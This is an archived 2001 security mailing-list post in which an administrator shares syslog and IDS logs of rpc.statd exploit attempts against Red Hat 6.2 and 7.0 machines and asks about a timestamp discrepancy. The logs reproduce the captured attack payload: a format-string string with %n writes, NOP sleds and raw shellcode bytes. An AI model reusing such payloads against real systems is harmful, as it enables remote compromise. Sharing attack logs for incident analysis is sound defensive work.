statd-exploit attack against RH 7.0


Welcome to the Virus.Org Mailing List Archive

[Date Prev] [Date Next] [Thread Prev] [Thread Next] [Date Index] [Thread Index]

To: [EMAIL PROTECTED]
Subject: statd-exploit attack against RH 7.0
From: "Johan.Augustsson" <[EMAIL PROTECTED]>
Date: Wed, 10 Jan 2001 18:07:53 +0100

My apologies if this already have been discussed in this forum.


We got a few attacks from scriptkiddies running some statd.x against our 
network and when I look at the messages in /var/log it looks different on a 
Red Hat 6.2 and 7.0 The thing thats annoys me is that at the Red Hat 7.0 
the timestamp for the attack has turned one hour backwards. Has anyone else 
seen this?

/Johan Augustsson


Red Hat 7.0
Jan 8 20:20:00 'system' some other event
Jan 8 19:24:04 'system' rpc.statd[366]: gethostbyname error for 
^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????1Àë|Y?A^P?A^HþÀ?A^D?ÃþÀ?^A°fÍ?³^B?Y^LÆA^N?ÆA^H^P?I^D?A^D^L?^A°fÍ?³^D°fÍ?³^E0À?A^D°fÍ??Î?Ã1É°?Í
Jan 8 20:25:00 'system' some other event


Red Hat 6.2
Jan 8 19:31:39 'system' some other event
Jan 8 20:05:57 'system' rpc.statd[356]: gethostbyname error for 
^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 

Jan 8 22:23:48 'system' some other event


And the logs from the IDS

2001-01-08 20:24:04  206.210.80.6 1088  ->  'Red Hat 7.0 111 IDS15 - RPC - 
portmap-request-status
2001-01-08 20:24:04  206.210.80.6 1088  ->  'Red Hat 7.0' 1025 IDS362 - 
MISC - Shellcode X86 NOPS-UDP
2001-01-08 20:05:57  206.210.80.6 1088  ->  'Red Hat 6.2' 111 IDS15 - RPC - 
portmap-request-status
2001-01-08 20:05:57  206.210.80.6 1088  ->  'Red Hat 6.2' 957 IDS362 - MISC 
- Shellcode X86 NOPS-UDP

Follow-Ups:
- Re: statd-exploit attack against RH 7.0
  - From: Johan.Augustsson
- Re: statd-exploit attack against RH 7.0
  - From: Pavel Kankovsky

Prev by Date: Re: DNS requests from 209.67.50.203 (fwd)
Next by Date: Re: DNS requests from 209.67.50.203 (fwd)
Previous by thread: Re: DNS requests from 209.67.50.203 (fwd)
Next by thread: Re: statd-exploit attack against RH 7.0
Index(es):
- Main
- Thread

Copyright (c) Virus.Org 1997-2006.
All Trademarks Acknowledged.
Please view our Terms and Conditions and our Privacy Policy.